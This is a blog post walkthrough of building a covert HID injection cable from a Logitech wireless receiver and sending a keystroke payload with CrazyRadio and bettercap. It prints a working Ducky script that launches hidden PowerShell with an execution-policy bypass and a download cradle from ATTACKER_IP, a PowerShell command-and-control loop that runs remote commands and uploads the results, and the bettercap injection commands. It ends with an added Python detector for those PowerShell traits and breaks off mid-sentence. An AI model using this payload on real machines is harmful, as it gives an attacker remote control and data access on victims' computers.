Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

From the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Soldered (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) to the receiver:

Put the USB connector cap on:

Added a nice plastic USB enclosure to make it more real:

The whole process was fast: it took me around 5 minutes to cut, solder and super-glue everything together. In the end I think it could be better, especially when I rammed the USB connector with a knife.

The second part took a little longer because I wanted to use an alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of the bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)

Write your Ducky payload – in this PoC it is just a reverse shell to my VPS

    DELAY 750
    GUI r
    DELAY 500
    STRING cmd
    ENTER
    DELAY 500
    STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
    ENTER
    DELAY 750

    function getUser() {
        $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
        $string = $string.Trim()
        return $string
    }

    function getComputerName() {
        $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
        $string = $string.Trim()
        return $string
    }

    $resp = "http://ATTACKER_IP:8000/rat"
    $w = New-Object Net.WebClient
    while($true) {
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
        $r_get = $w.DownloadString($resp)
        $d = [System.Convert]::FromBase64String($r_get);
        $Ds = [System.Text.Encoding]::UTF8.GetString($d);
        while($r_get) {
            $output = invoke-expression $Ds | out-string
            $w.UploadString($resp, $output)
            break
        }
    }

Connect the HID cable to the Windows victim machine (don’t forget that the payload will be OS dependent)

Start your listener on the attacker machine

Connect CrazyRadio and start bettercap

    bettercap -eval="hid.recon on"
    hid.inject MAC PT ducky.txt

And it's basically game over.

I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.
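Seen from the defender's side, the command line this payload types stands out in process-creation logs. The following is an added example, not code from the original post: a Python triage function that checks PowerShell command lines for the traits used in the Ducky payload above. The event field names follow Sysmon Event ID 1, and the sample events and the 192.0.2.10 address are constructed.

```python
import re

def flag(full, min_len, value=None):
    """Match a PowerShell parameter by any accepted prefix of its full name."""
    names = "|".join(full[:i] for i in range(len(full), min_len - 1, -1))
    tail = rf"\s+{value}\b" if value else r"(?!\S)"
    return re.compile(rf"(?<!\S)[-/](?:{names}){tail}", re.I)

# One entry per trait of the command line typed by the page's Ducky payload.
INDICATORS = {
    "no_profile":      flag("noprofile", 3),
    "non_interactive": flag("noninteractive", 4),
    "policy_bypass":   flag("executionpolicy", 2, "bypass"),
    "hidden_window":   flag("windowstyle", 1, "hidden"),
    "iex":             re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download":    re.compile(r"\.download(?:string|data|file)\s*\(", re.I),
}

def triage(event):
    """Return (sorted indicator names, alert?) for one process-creation event."""
    image = event["Image"].lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return [], False
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(event["CommandLine"]))
    cradle = "iex" in hits and "web_download" in hits
    # Alert on a download cradle run in a hidden window, or on any four traits together.
    return hits, (cradle and "hidden_window" in hits) or len(hits) >= 4

# Constructed sample events (not real logs), shaped like Sysmon Event ID 1 fields.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoP -NonI -Exec Bypass -W hidden "
                    "\"IEX (New-Object System.Net.WebClient).DownloadString('http://192.0.2.10/ps.txt')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev))
```

The alert threshold is an assumption of this example; tune it against the administrative scripts that legitimately run in your environment.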

In the process of creating this HID cable with “leftovers” I learned a few things: